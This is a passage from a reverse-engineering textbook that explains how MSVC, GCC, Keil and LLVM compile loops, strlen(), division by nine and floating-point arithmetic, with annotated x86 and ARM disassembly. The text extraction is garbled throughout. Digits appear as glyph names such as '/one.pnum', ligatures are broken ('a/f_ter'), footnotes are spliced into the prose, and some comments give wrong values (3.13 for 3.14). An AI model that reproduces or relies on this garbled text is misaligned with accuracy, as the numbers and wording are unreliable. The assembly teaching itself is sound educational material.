main endp
Now let’s see what we will get if optimization is turned on ( /Ox):
Listing /one.pnum./two.pnum/nine.pnum: Optimizing MSVC
_main PROC
push esi
mov esi, 2
$LL3@main:
push esi
call _f
inc esi
add esp, 4
cmp esi, 10 ; 0000000aH
jl SHORT $LL3@main
xor eax, eax
pop esi
ret 0
_main ENDP
What is going on here is: place for ivariable is not allocated in local stack anymore, but even individual register:
ESI. This is possible in such small functions where not so many local variables are present.
One very important property is that f()function should not change ESIvalue. Our compiler is sure here. And
if compiler decided to use ESIinf()too, it would be saved then at f()function prologue and restored at f()
epilogue. Almost like in our listing: please note PUSH ESI/POP ESI at the function begin and end.
Let’s try GCC /four.pnum./four.pnum./one.pnum with maximal optimization turned on ( -O3option):
Listing /one.pnum./three.pnum/zero.pnum: Optimizing GCC /four.pnum./four.pnum./one.pnum
main proc near ; DATA XREF: _start+17
var_10 = dword ptr -10h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 10h
mov [esp+10h+var_10], 2
call f
mov [esp+10h+var_10], 3
/four.pnum/five.pnum
call f
mov [esp+10h+var_10], 4
call f
mov [esp+10h+var_10], 5
call f
mov [esp+10h+var_10], 6
call f
mov [esp+10h+var_10], 7
call f
mov [esp+10h+var_10], 8
call f
mov [esp+10h+var_10], 9
call f
xor eax, eax
leave
retn
main endp
Huh, GCC just unwind our loop.
Loop unwinding has advantage in these cases when there are not so much iterations and we could economy
some execution speed by removing all loop supporting instructions. On the other side, resulting code is obviously
larger.
OK, let’s increase maximal value of ito /one.pnum/zero.pnum/zero.pnum and try again. GCC resulting:
Listing /one.pnum./three.pnum/one.pnum: GCC
public main
main proc near
var_20 = dword ptr -20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
push ebx
mov ebx, 2 ; i=2
sub esp, 1Ch
nop ; aligning label loc_80484D0 (loop body begin) by 16-byte border
loc_80484D0:
mov [esp+20h+var_20], ebx ; pass i as first argument to f()
add ebx, 1 ; i++
call f
cmp ebx, 64h ; i==100?
jnz short loc_80484D0 ; if not, continue
add esp, 1Ch
xor eax, eax ; return 0
pop ebx
mov esp, ebp
pop ebp
retn
main endp
It’s quite similar to what MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with optimization ( /Ox) produce. With the exception that EBXregister will
be fixed to ivariable. GCC is sure this register will not be modified inside of f()function, and if it will, it will be
saved at the function prologue and restored at epilogue, just like here in main() .
/one.pnum./one.pnum/zero.pnum./two.pnum ARM
Non-optimizing Keil + ARM mode
main
STMFD SP!, {R4,LR}
MOV R4, #2
/four.pnum/six.pnum
B loc_368
; ---------------------------------------------------------------------------
loc_35C ; CODE XREF: main+1C
MOV R0, R4
BL f
ADD R4, R4, #1
loc_368 ; CODE XREF: main+8
CMP R4, #0xA
BLT loc_35C
MOV R0, #0
LDMFD SP!, {R4,PC}
Iteration counter iwill be stored in R4register.
“MOV R4, #2” instruction just initializing i.
“MOV R0, R4” and“BL f” instructions are compose loop body, the first instruction preparing argument for
f()function and the second is calling it.
“ADD R4, R4, #1” instruction is just adding 1toiduring each iteration.
“CMP R4, #0xA” comparing iwith0xA(10). Next instruction BLT(Branch Less Than ) will jump if iis less than
10.
Otherwise, 0will be written into R0(because our function returning 0) and function execution ended.
Optimizing Keil + thumb mode
_main
PUSH {R4,LR}
MOVS R4, #2
loc_132 ; CODE XREF: _main+E
MOVS R0, R4
BL example7_f
ADDS R4, R4, #1
CMP R4, #0xA
BLT loc_132
MOVS R0, #0
POP {R4,PC}
Practically, the same.
Optimizing Xcode (LLVM) + thumb-/two.pnum mode
_main
PUSH {R4,R7,LR}
MOVW R4, #0x1124 ; "%d\n"
MOVS R1, #2
MOVT.W R4, #0
ADD R7, SP, #4
ADD R4, PC
MOV R0, R4
BLX _printf
MOV R0, R4
MOVS R1, #3
BLX _printf
MOV R0, R4
MOVS R1, #4
BLX _printf
MOV R0, R4
MOVS R1, #5
BLX _printf
MOV R0, R4
MOVS R1, #6
/four.pnum/seven.pnum
BLX _printf
MOV R0, R4
MOVS R1, #7
BLX _printf
MOV R0, R4
MOVS R1, #8
BLX _printf
MOV R0, R4
MOVS R1, #9
BLX _printf
MOVS R0, #0
POP {R4,R7,PC}
In fact, this was in my f()function:
void f(int i)
{
// do something here
printf ("%d\n", i);
};
So, LLVM not just unrolled the loop, but also represented my very simple function f()asinlined , and inserted
its body /eight.pnum times instead of loop. This is possible when function is so primitive, like mine, and when it’s called not
many times, like here.
/one.pnum./one.pnum/zero.pnum./three.pnum One more thing
On the code generated we can see: a/f_ter iinitialization, loop body will not be executed, but icondition checked
first, and only a/f_ter loop body is to be executed. And that’s correct. Because, if loop condition is not met at the
beginning, loop body shouldn’t be executed. For example, this is possible in the following case:
for (i; i<total_entries_to_process; i++)
loop_body;
Iftotal_entries_to_process equals to zero, loop body shouldn’t be executed whatsoever. So that’s why condi-
tion checked before loop body execution.
However, optimizing compiler may swap condition check and loop body, if it sure that the situation described
here is not possible, like in case of our very simple example and Keil, Xcode (LLVM), MSVC in optimization mode.
/four.pnum/eight.pnum
/one.pnum./one.pnum/one.pnum strlen()
Now let’s talk about loops one more time. O/f_ten, strlen() function/four.pnum/nine.pnumis implemented using while() statement.
Here is how it’s done in MSVC standard libraries:
int strlen (const char * str)
{
const char *eos = str;
while( *eos++ ) ;
return( eos - str - 1 );
}
/one.pnum./one.pnum/one.pnum./one.pnum x/eight.pnum/six.pnum
Let’s compile:
_eos$ = -4 ; size = 4
_str$ = 8 ; size = 4
_strlen PROC
push ebp
mov ebp, esp
push ecx
mov eax, DWORD PTR _str$[ebp] ; place pointer to string from str
mov DWORD PTR _eos$[ebp], eax ; place it to local varuable eos
$LN2@strlen_:
mov ecx, DWORD PTR _eos$[ebp] ; ECX=eos
; take 8-bit byte from address in ECX and place it as 32-bit value to EDX with sign extension
movsx edx, BYTE PTR [ecx]
mov eax, DWORD PTR _eos$[ebp] ; EAX=eos
add eax, 1 ; increment EAX
mov DWORD PTR _eos$[ebp], eax ; place EAX back to eos
test edx, edx ; EDX is zero?
je SHORT $LN1@strlen_ ; yes, then finish loop
jmp SHORT $LN2@strlen_ ; continue loop
$LN1@strlen_:
; here we calculate the difference between two pointers
mov eax, DWORD PTR _eos$[ebp]
sub eax, DWORD PTR _str$[ebp]
sub eax, 1 ; subtract 1 and return result
mov esp, ebp
pop ebp
ret 0
_strlen_ ENDP
Two new instructions here: MOVSX /one.pnum./one.pnum/one.pnum./one.pnum and TEST .
About first: MOVSX /one.pnum./one.pnum/one.pnum./one.pnum is intended to take byte from some place and store value in /three.pnum/two.pnum-bit register. MOVSX /one.pnum./one.pnum/one.pnum./one.pnum
meaning MOV with Sign-Extent . Rest bits starting at /eight.pnumth till /three.pnum/one.pnumth MOVSX /one.pnum./one.pnum/one.pnum./one.pnum will set to 1if source byte in memory
hasminus sign or to /zero.pnum if plus.
And here is why all this.
C/C++ standard defines char type as signed. If we have two values, one is char and another is int, (intis signed
too), and if first value contain −2(it is coded as 0xFE ) and we just copying this byte into intcontainer, there
will be 0x000000 FE, and this, from the point of signed intview is 254, but not−2. In signed int,−2is coded as
0xFFFFFFFE . So if we need to transfer 0xFE value from variable of char type to int, we need to identify its
sign and extend it. That is what MOVSX /one.pnum./one.pnum/one.pnum./one.pnum does.
See also in section “ Signed number representations ” /two.pnum./four.pnum.
/four.pnum/nine.pnumcounting characters in string in C language
/four.pnum/nine.pnum
I’m not sure if compiler need to store char variable in EDX, it could take /eight.pnum-bit register part (let’s say DL). Appar-
ently, compiler’s register allocator/five.pnum/zero.pnumworks like that.
Then we see TEST EDX, EDX . AboutTEST instruction, read more in section about bit fields /one.pnum./one.pnum/five.pnum. But here, this
instruction just checking EDXvalue, if it is equals to 0.
Let’s try GCC /four.pnum./four.pnum./one.pnum:
public strlen
strlen proc near
eos = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
mov [ebp+eos], eax
loc_80483F0:
mov eax, [ebp+eos]
movzx eax, byte ptr [eax]
test al, al
setnz al
add [ebp+eos], 1
test al, al
jnz short loc_80483F0
mov edx, [ebp+eos]
mov eax, [ebp+arg_0]
mov ecx, edx
sub ecx, eax
mov eax, ecx
sub eax, 1
leave
retn
strlen endp
The result almost the same as MSVC did, but here we see MOVZX isntead of MOVSX /one.pnum./one.pnum/one.pnum./one.pnum.MOVZX mean MOV with
Zero-Extent . This instruction place /eight.pnum-bit or /one.pnum/six.pnum-bit value into /three.pnum/two.pnum-bit register and set the rest bits to zero. In fact, this
instruction is handy only because it is able to replace two instructions at once: xor eax, eax / mov al, [...] .
On other hand, it is obvious to us that compiler could produce that code: mov al, byte ptr [eax] / test
al, al — it is almost the same, however, highest EAXregister bits will contain random noise. But let’s think it is
compiler’s drawback — it can’t produce more understandable code. Strictly speaking, compiler is not obliged to
emit understandable (to humans) code at all.
Next new instruction for us is SETNZ . Here, if ALcontain not zero, test al, al will set zero to ZFflag, but
SETNZ , ifZF==0 (NZmean not zero ) will set /one.pnum to AL. Speaking in natural language, if AL is not zero, let’s jump to
loc_/eight.pnum/zero.pnum/four.pnum/eight.pnum/three.pnumF/zero.pnum . Compiler emitted slightly redundant code, but let’s not forget that optimization is turned off.
Now let’s compile all this in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum, with optimization turned on ( /Ox):
_str$ = 8 ; size = 4
_strlen PROC
mov ecx, DWORD PTR _str$[esp-4] ; ECX -> pointer to the string
mov eax, ecx ; move to EAX
$LL2@strlen_:
mov dl, BYTE PTR [eax] ; DL = *EAX
inc eax ; EAX++
test dl, dl ; DL==0?
jne SHORT $LL2@strlen_ ; no, continue loop
sub eax, ecx ; calculate pointers difference
dec eax ; decrement EAX
ret 0
_strlen_ ENDP
/five.pnum/zero.pnumcompiler’s function assigning local variables to CPU registers
/five.pnum/zero.pnum
Now it’s all simpler. But it is needless to say that compiler could use registers such efficiently only in small
functions with small number of local variables.
INC/DEC— are increment/decrement instruction, in other words: add /one.pnum to variable or subtract.
Let’s check GCC /four.pnum./four.pnum./one.pnum with optimization turned on ( -O3key):
public strlen
strlen proc near
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
mov eax, ecx
loc_8048418:
movzx edx, byte ptr [eax]
add eax, 1
test dl, dl
jnz short loc_8048418
not ecx
add eax, ecx
pop ebp
retn
strlen endp
Here GCC is almost the same as MSVC, except of MOVZX presence.
However, MOVZX could be replaced here to mov dl, byte ptr [eax] .
Probably, it is simpler for GCC compiler’s code generator to remember that whole register is allocated for char
variable and it can be sure that highest bits will not contain noise at any point.
A/f_ter, we also see new instruction NOT. This instruction inverts all bits in operand. It can be said, it is synonym
toXOR ECX, 0ffffffffh instruction. NOTand following ADDcalculating pointer difference and subtracting /one.pnum. At
the beginning ECX, where pointer to str is stored, inverted and /one.pnum is subtracted from it.
See also: “Signed number representations” /two.pnum./four.pnum.
In other words, at the end of function, just a/f_ter loop body, these operations are executed:
ecx=str;
eax=eos;
ecx=(-ecx)-1;
eax=eax+ecx
return eax
...and this is equivalent to:
ecx=str;
eax=eos;
eax=eax-ecx;
eax=eax-1;
return eax
Why GCC decided it would be better? I cannot be sure. But I’m assure that both variants are equivalent in
efficiency sense.
/one.pnum./one.pnum/one.pnum./two.pnum ARM
Non-optimizing Xcode (LLVM) + ARM mode
Listing /one.pnum./three.pnum/two.pnum: Non-optimizing Xcode (LLVM) + ARM mode
_strlen
eos = -8
str = -4
/five.pnum/one.pnum
SUB SP, SP, #8 ; allocate 8 bytes for local variables
STR R0, [SP,#8+str]
LDR R0, [SP,#8+str]
STR R0, [SP,#8+eos]
loc_2CB8 ; CODE XREF: _strlen+28
LDR R0, [SP,#8+eos]
ADD R1, R0, #1
STR R1, [SP,#8+eos]
LDRSB R0, [R0]
CMP R0, #0
BEQ loc_2CD4
B loc_2CB8
; ----------------------------------------------------------------
loc_2CD4 ; CODE XREF: _strlen+24
LDR R0, [SP,#8+eos]
LDR R1, [SP,#8+str]
SUB R0, R0, R1 ; R0=eos-str
SUB R0, R0, #1 ; R0=R0-1
ADD SP, SP, #8 ; deallocate 8 bytes for local variables
BX LR
Non-optimizing LLVM generates too much code, however, here we can see how function works with local vari-
ables in stack. There are only two local variables in our function, eosand str.
In this listing, generated by IDA /five.pnum, I renamed var_/eight.pnum and var_/four.pnum into eosand strmanually.
So, first instructions are just saves input value in strand eos.
Loop body is beginning at loc_/two.pnumCB/eight.pnum label.
First three instruction in loop body ( LDR,ADD,STR) loads eosvalue into R0, then value is incremented and it’s
saving back into eoslocal variable located in stack.
The next“LDRSB R0, [R0]” (Load Register Signed Byte ) instruction loading byte from memory at R0address
and sign-extends it to /three.pnum/two.pnum-bit. This is similar to MOVSX /one.pnum./one.pnum/one.pnum./one.pnum instruction in x/eight.pnum/six.pnum. The compiler treating this byte as
signed because char type in C standard is signed. I already wrote about it /one.pnum./one.pnum/one.pnum./one.pnum in this section, but related to x/eight.pnum/six.pnum.
It’s should be noted, there are to way to use /eight.pnum-bit part or /one.pnum/six.pnum-bit part of /three.pnum/two.pnum-bit register in ARM, as it’s possible
in x/eight.pnum/six.pnum. Apparently, it’s because x/eight.pnum/six.pnum has a huge history of compatibility with its ancestors like /one.pnum/six.pnum-bit /eight.pnum/zero.pnum/eight.pnum/six.pnum and
even /eight.pnum-bit /eight.pnum/zero.pnum/eight.pnum/zero.pnum, but ARM was developed from scratch as /three.pnum/two.pnum-bit RISC-processor. Consequently, in order to process
separate bytes in ARM, one have to use /three.pnum/two.pnum-bit registers anyway.
So,LDRSB loads symbol from string into R0, one by one. Next CMPandBEQinstructions checks, if loaded symbol
is zero. If not zero, control passing to loop body begin. And if zero, loop is finishing.
At the end of function, a difference between eosand stris calculated, /one.pnum is also subtracting, and resulting value
is returned via R0.
By the way, please note, registers wasn’t saved in this function. That’s because by ARM calling convention, R0-
R3registers are “scratch registers” , they are intended for arguments passing, its values may not be restored upon
function exit, because calling function will not use them anymore. Consequently, they may be used for anything
we want. Other registers are not used here, so that’s why we have nothing to save in stack. Thus, control may be
returned back to calling function by simple jump ( BX), to address in LRregister.
Optimizing Xcode (LLVM) + thumb mode
Listing /one.pnum./three.pnum/three.pnum: Optimizing Xcode (LLVM) + thumb mode
_strlen
MOV R1, R0
loc_2DF6 ; CODE XREF: _strlen+8
LDRB.W R2, [R1],#1
CMP R2, #0
BNE loc_2DF6
MVNS R0, R0
ADD R0, R1
/five.pnum/two.pnum
BX LR
As optimizing LLVM concludes, place in stack for eosand strmay not be allocated, and these variables may
always be stored right in registers. Before loop body beginning, strwill always be in R0, and eos— inR1.
“LDRB.W R2, [R1],#1” instruction loads byte from memory at the address R1intoR2, sign-extending it to
/three.pnum/two.pnum-bit value, but not only that. #1at the instruction’s end calling “Post-indexed addressing” , this mean, 1is to be
added to R1a/f_ter byte load. That’s handy when accessing arrays.
There are no such addressing mode in x/eight.pnum/six.pnum, but it’s present in some other processors, even on PDP-/one.pnum/one.pnum. There is
a legend that pre-increment, post-increment, pre-decrement and post-decrement modes in PDP-/one.pnum/one.pnum, were “guilty”
in appearance such C language (which developed on PDP-/one.pnum/one.pnum) constructs as *ptr++, *++ptr, *ptr--, *--ptr. By the way,
this is one of hard to memorize C feature. This is how it is:
C term ARM term C statement how it works
Post-increment post-indexed addressing *ptr++ use*ptr value,
then increment ptrpointer
Post-decrement post-indexed addressing *ptr-- use*ptr value,
then decrement ptrpointer
Pre-increment pre-indexed addressing *++ptr increment ptrpointer,
then use*ptr value
Pre-decrement post-indexed addressing *--ptr decrement ptrpointer,
then use*ptr value
Dennis Ritchie (one of C language creators) mentioned that it’s, probably, was invented by Ken Tompson (an-
other C creator) because this processor feature was present in PDP-/seven.pnum [Rit/eight.pnum/six.pnum] [Rit/nine.pnum/three.pnum]. Thus, C language compilers
may use it, if it’s present in targer processor.
Then one may spot CMPandBNEin loop body, these instructions continue operation until 0will be met in string.
MVNS/five.pnum/one.pnum(inverting all bits, NOTin x/eight.pnum/six.pnum analogue) instructions and ADDcomputes eos−str−1. In fact, these two
instructions computes R0 =str+eos, which is equivalent to what was in source code, and why it’s so, I already
described here /one.pnum./one.pnum/one.pnum./one.pnum.
Apparently, LLVM, just like GCC, concludes this code will be shorter, or faster.
Optimizing Keil + ARM mode
Listing /one.pnum./three.pnum/four.pnum: Optimizing Keil + ARM mode
_strlen
MOV R1, R0
loc_2C8 ; CODE XREF: _strlen+14
LDRB R2, [R1],#1
CMP R2, #0
SUBEQ R0, R1, R0
SUBEQ R0, R0, #1
BNE loc_2C8
BX LR
Almost the same what we saw before, with the exception that str−eos−1expression may be computed not
at the function’s end, but right in loop body. -EQsuffix, as we may recall, mean that instruction will be executed
only if operands in executed before CMPwere equal to each other. Thus, if 0will be in R0, bothSUBEQ instructions
are to be executed and result is leaving in R0.
/five.pnum/one.pnumMoVe Not
/five.pnum/three.pnum
/one.pnum./one.pnum/two.pnum Division by /nine.pnum
Very simple function:
int f(int a)
{
return a/9;
};
Is compiled in a very predictable way:
Listing /one.pnum./three.pnum/five.pnum: MSVC
_a$ = 8 ; size = 4
_f PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _a$[ebp]
cdq ; sign extend EAX to EDX:EAX
mov ecx, 9
idiv ecx
pop ebp
ret 0
_f ENDP
IDIV divides /six.pnum/four.pnum-bit number stored in EDX:EAX register pair by value in ECXregister. As a result, EAXwill contain
quotient/five.pnum/two.pnum, andEDX— remainder. Result is returning from f() function in EAXregister, so, that value is not moved
anymore a/f_ter division operation, it is in right place already. Because IDIV require value in EDX:EAX register pair,
CDQinstruction (before IDIV ) extending EAXvalue to /six.pnum/four.pnum-bit value taking value sign into account, just as MOVSX /one.pnum./one.pnum/one.pnum./one.pnum
does. If we turn optimization on ( /Ox), we got:
Listing /one.pnum./three.pnum/six.pnum: Optimizing MSVC
_a$ = 8 ; size = 4
_f PROC
mov ecx, DWORD PTR _a$[esp-4]
mov eax, 954437177 ; 38e38e39H
imul ecx
sar edx, 1
mov eax, edx
shr eax, 31 ; 0000001fH
add eax, edx
ret 0
_f ENDP
This is — division using multiplication. Multiplication operation working much faster. And it is possible to
use that trick/five.pnum/three.pnumto produce a code which is equivalent and faster. GCC /four.pnum./four.pnum./one.pnum even without optimization turned on,
generate almost the same code as MSVC with optimization turned on:
Listing /one.pnum./three.pnum/seven.pnum: Non-optimizing GCC /four.pnum./four.pnum./one.pnum
public f
f proc near
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
mov edx, 954437177
mov eax, ecx
imul edx
/five.pnum/two.pnumresult of division
/five.pnum/three.pnumRead more about division by multiplication in [War/zero.pnum/two.pnum, chapter /one.pnum/zero.pnum] and: MSDN: Integer division by constants, http://www.nynaeve.
net/?p=115
/five.pnum/four.pnum
sar edx, 1
mov eax, ecx
sar eax, 1Fh
mov ecx, edx
sub ecx, eax
mov eax, ecx
pop ebp
retn
f endp
/one.pnum./one.pnum/two.pnum./one.pnum ARM
ARM processor, just like in any other ”pure” RISC-processors, lacks division instruction It lacks also a single in-
struction for multiplication by /three.pnum/two.pnum-bit constant. By using one clever trick, it’s possible to do division using only
three instructions: addition, subtraction and bit shi/f_ts /one.pnum./one.pnum/five.pnum.
Here is an example of /three.pnum/two.pnum-bit number division by /one.pnum/zero.pnum from [Ltd/nine.pnum/four.pnum, /three.pnum./three.pnum Division by a Constant]. Quotient and
remainder on output.
; takes argument in a1
; returns quotient in a1, remainder in a2
; cycles could be saved if only divide or remainder is required
SUB a2, a1, #10 ; keep (x-10) for later
SUB a1, a1, a1, lsr #2
ADD a1, a1, a1, lsr #4
ADD a1, a1, a1, lsr #8
ADD a1, a1, a1, lsr #16
MOV a1, a1, lsr #3
ADD a3, a1, a1, asl #2
SUBS a2, a2, a3, asl #1 ; calc (x-10) - (x/10)*10
ADDPL a1, a1, #1 ; fix-up quotient
ADDMI a2, a2, #10 ; fix-up remainder
MOV pc, lr
Optimizing Xcode (LLVM) + ARM mode
__text:00002C58 39 1E 08 E3 E3 18 43 E3 MOV R1, 0x38E38E39
__text:00002C60 10 F1 50 E7 SMMUL R0, R0, R1
__text:00002C64 C0 10 A0 E1 MOV R1, R0,ASR#1
__text:00002C68 A0 0F 81 E0 ADD R0, R1, R0,LSR#31
__text:00002C6C 1E FF 2F E1 BX LR
This code is mostly the same to what was generated by optimizing MSVC and GCC. Apparently, LLVM use the
same algorithm for constants generating.
Observant reader may ask, how MOVwrites /three.pnum/two.pnum-bit value in register, while this isn’t possible in ARM mode. It’s
not possible indeed, but, as we see, there are /eight.pnum bytes per instruction instead of standard /four.pnum, in fact, there are two
instructions. First instruction loading 0x8E39value into low /one.pnum/six.pnum bit of register and second instruction is in fact MOVT ,
it loading 0x383Einto high /one.pnum/six.pnum-bit of register. IDA /five.pnum is aware of such sequences, and for the sake of compactness,
reduced it to one single “pseudo-instruction” .
SMMUL (Signed Most Significant Word Multiply ) instruction multilpy numbers treating them as signed numbers,
and leaving high /three.pnum/two.pnum-bit part of result in R0, dropping low /three.pnum/two.pnum-bit part of result.
“MOV R1, R0,ASR#1” instruction is arithmetic shi/f_t right by one bit.
“ADD R0, R1, R0,LSR#31” isR0 =R1 +R0>>31
As a matter of fact, there are no separate shi/f_ting instruction in ARM mode. Instead, some instructions like
(MOV,ADD,SUB,RSB)/five.pnum/four.pnumMay be supplied by option, is the second operand should be shi/f_ted, if yes, by what value
and how. ASRmeaning Arithmetic Shi/f_t Right ,LSR —Logican Shi/f_t Right .
/five.pnum/four.pnumThese instructions are also called “data processing instructions”
/five.pnum/five.pnum
Optimizing Xcode (LLVM) + thumb-/two.pnum mode
MOV R1, 0x38E38E39
SMMUL.W R0, R0, R1
ASRS R1, R0, #1
ADD.W R0, R1, R0,LSR#31
BX LR
There are separate instructions for shi/f_ting in thumb mode, and one of them is used here — ASRS (arithmetic
shi/f_t right).
Non-optimizing Xcode (LLVM) and Keil
Non-optimizing LLVM do not generate code we saw before in this section, but inserting a call to library function
___divsi/three.pnum instead.
What about Keil: it inserting call to library function __aeabi_idivmod in all cases.
/five.pnum/six.pnum
/one.pnum./one.pnum/three.pnum Work with FPU
FPU ( Floating-point unit ) — is a device within main CPU specially designed to work with floating point numbers.
It was called coprocessor in past. It looks like programmable calculator in some way and stay aside of main
processor.
It is worth to study stack machines/five.pnum/five.pnumbefore FPU studying, or learn Forth language basics/five.pnum/six.pnum.
It is interesting to know that in past (before /eight.pnum/zero.pnum/four.pnum/eight.pnum/six.pnum CPU) coprocessor was a separate chip and it was not always
settled on motherboard. It was possible to buy it separately and install.
Starting at /eight.pnum/zero.pnum/four.pnum/eight.pnum/six.pnum CPU, FPU is always present in it.
FPU has a stack capable to hold /eight.pnum /eight.pnum/zero.pnum-bit registers, each register can hold a number in IEEE /seven.pnum/five.pnum/four.pnum/five.pnum/seven.pnumformat.
C/C++ language offer at least two floating number types, float (single-precision/five.pnum/eight.pnum, /three.pnum/two.pnum bits)/five.pnum/nine.pnumand double (double-
precision/six.pnum/zero.pnum, /six.pnum/four.pnum bits).
GCC also supports long double type ( extended precision/six.pnum/one.pnum, /eight.pnum/zero.pnum bit) but MSVC is not.
float type require the same number of bits as inttype in /three.pnum/two.pnum-bit environment, but number representation is
completely different.
Number consisting of sign, significand (also called fraction ) and exponent.
Function having float ordouble among argument list is getting that value via stack. If function is returning float
ordouble value, it leave that value in ST(0) register — at top of FPU stack.
/one.pnum./one.pnum/three.pnum./one.pnum Simple example
Let’s consider simple example:
double f (double a, double b)
{
return a/3.14 + b*4.1;
};
x/eight.pnum/six.pnum
Compile it in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum:
Listing /one.pnum./three.pnum/eight.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
CONST SEGMENT
__real@4010666666666666 DQ 04010666666666666r ; 4.1
CONST ENDS
CONST SEGMENT
__real@40091eb851eb851f DQ 040091eb851eb851fr ; 3.14
CONST ENDS
_TEXT SEGMENT
_a$ = 8 ; size = 8
_b$ = 16 ; size = 8
_f PROC
push ebp
mov ebp, esp
fld QWORD PTR _a$[ebp]
; current stack state: ST(0) = _a
fdiv QWORD PTR __real@40091eb851eb851f
; current stack state: ST(0) = result of _a divided by 3.13
/five.pnum/five.pnumhttp://en.wikipedia.org/wiki/Stack_machine
/five.pnum/six.pnumhttp://en.wikipedia.org/wiki/Forth_(programming_language)
/five.pnum/seven.pnumhttp://en.wikipedia.org/wiki/IEEE_754-2008
/five.pnum/eight.pnumhttp://en.wikipedia.org/wiki/Single-precision_floating-point_format
/five.pnum/nine.pnumsingle precision float numbers format is also addressed in Working with the float type as with a structure /one.pnum./one.pnum/six.pnum./six.pnum section
/six.pnum/zero.pnumhttp://en.wikipedia.org/wiki/Double-precision_floating-point_format
/six.pnum/one.pnumhttp://en.wikipedia.org/wiki/Extended_precision
/five.pnum/seven.pnum
fld QWORD PTR _b$[ebp]
; current stack state: ST(0) = _b; ST(1) = result of _a divided by 3.13
fmul QWORD PTR __real@4010666666666666
; current stack state: ST(0) = result of _b * 4.1; ST(1) = result of _a divided by 3.13
faddp ST(1), ST(0)
; current stack state: ST(0) = result of addition
pop ebp
ret 0
_f ENDP
FLDtakes /eight.pnum bytes from stack and load the number into ST(0) register, automatically converting it into internal
/eight.pnum/zero.pnum-bit format extended precision ).
FDIV divide value in register ST(0) by number storing at address __real@40091eb851eb851f — /three.pnum./one.pnum/four.pnum value is
coded there. Assembler syntax missing floating point numbers, so, what we see here is hexadecimal representa-
tion of /three.pnum./one.pnum/four.pnumnumber in /six.pnum/four.pnum-bit IEEE /seven.pnum/five.pnum/four.pnum encoded.
A/f_terFDIV execution, ST(0) will hold quotient/six.pnum/two.pnum.
By the way, there are also FDIVP instruction, which divide ST(1) byST(0) , popping both these values from
stack and then pushing result. If you know Forth language/six.pnum/three.pnum, you will quickly understand that this is stack ma-
chine/six.pnum/four.pnum.
NextFLDinstruction pushing bvalue into stack.
A/f_ter that, quotient is placed to ST(1) , andST(0) will hold bvalue.
NextFMUL instruction do multiplication: bfromST(0) register by value at __real@4010666666666666 (/four.pnum./one.pnum
number is there) and leaves result in ST(0) .
Very lastFADDP instruction adds two values at top of stack, placing result at ST(1) register and then popping
value atST(1) , hereby leaving result at top of stack in ST(0) .
The function must return result in ST(0) register, so, a/f_ter FADDP there are no any other code except of function
epilogue.
GCC /four.pnum./four.pnum./one.pnum (with -O3option) emitting the same code, however, slightly different:
Listing /one.pnum./three.pnum/nine.pnum: Optimizing GCC /four.pnum./four.pnum./one.pnum
public f
f proc near
arg_0 = qword ptr 8
arg_8 = qword ptr 10h
push ebp
fld ds:dbl_8048608 ; 3.14
; stack state now: ST(0) = 3.13
mov ebp, esp
fdivr [ebp+arg_0]
; stack state now: ST(0) = result of division
fld ds:dbl_8048610 ; 4.1
; stack state now: ST(0) = 4.1, ST(1) = result of division
fmul [ebp+arg_8]
/six.pnum/two.pnumresult of division
/six.pnum/three.pnumhttp://en.wikipedia.org/wiki/Forth_(programming_language)
/six.pnum/four.pnumhttp://en.wikipedia.org/wiki/Stack_machine
/five.pnum/eight.pnum
; stack state now: ST(0) = result of multiplication, ST(1) = result of division
pop ebp
faddp st(1), st
; stack state now: ST(0) = result of addition
retn
f endp
The difference is that, first of all, /three.pnum./one.pnum/four.pnum is pushing to stack (into ST(0) ), and then value in arg_0 is dividing by
what is in ST(0) register.
FDIVR meaning Reverse Divide — to divide with divisor and dividend swapped with each other. There are no
such instruction for multiplication, because multiplication is commutative operation, so we have just FMUL without
its-Rcounterpart.
FADDP adding two values but also popping one value from stack. A/f_ter that operation, ST(0) will contain sum.
This fragment of disassembled code was produced using IDA /five.pnum which named ST(0) register as STfor short.
ARM: Optimizing Xcode (LLVM) + ARM mode
Until ARM has floating standardized point support, several processor manufacturers may add their own instruc-
tions extensions. Then, VFP ( Vector Floating Point ) was standardized.
One important difference from x/eight.pnum/six.pnum, there you working with FPU-stack, but here, in ARM, there are no any stack,
you work just with registers.
f
VLDR D16, =3.14
VMOV D17, R0, R1 ; load a
VMOV D18, R2, R3 ; load b
VDIV.F64 D16, D17, D16 ; a/3.14
VLDR D17, =4.1
VMUL.F64 D17, D18, D17 ; b*4.1
VADD.F64 D16, D17, D16 ; +
VMOV R0, R1, D16
BX LR
dbl_2C98 DCFD 3.14 ; DATA XREF: f
dbl_2CA0 DCFD 4.1 ; DATA XREF: f+10
So, we see here new registers used, with D prefix. These are /six.pnum/four.pnum-bit registers, there are /three.pnum/two.pnum of them, and these
can be used both for floating-point numbers (double), but also for SIMD (it’s called NEON here in ARM).
There are also /three.pnum/two.pnum /three.pnum/two.pnum-bit S-registers, they are intended to be used for single precision floating pointer numbers
(float).
It’s easy to remember: D-registers are intended for double precision numbers, while S-registers — for single
precision numbers.
Both ( 3.14and4.1) constants are stored in memory in IEEE /seven.pnum/five.pnum/four.pnum form.
VLDR andVMOV instructions, as it can be easily deduced, are analogous to LDRandMOV, but they works with
D-registers. It should be noted that these instructions, just like D-registers, are intended not only for floating point
numbers, but can be also used for SIMD (NEON) operations and this will also be revealed soon.
Arguments are passed to function by usual way, via R-registers, however, each number having double precision
has size /six.pnum/four.pnum-bits, so, for passing each, two R-registers are needed.
“VMOV D17, R0, R1” at the very beginning, composing two /three.pnum/two.pnum-bit values from R0andR1into one /six.pnum/four.pnum-bit value
and saves it to D17.
“VMOV R0, R1, D16” is inverse operation, what was in D16leaving in two R0andR1registers, because, double-
precision number, needing /six.pnum/four.pnum bits for storage, returning in R0andR1registers pair.
VDIV ,VMUL andVADD , are instruction for floating point numbers processing, computing, quotient/six.pnum/five.pnum, prod-
/six.pnum/five.pnumresult of division
/five.pnum/nine.pnum
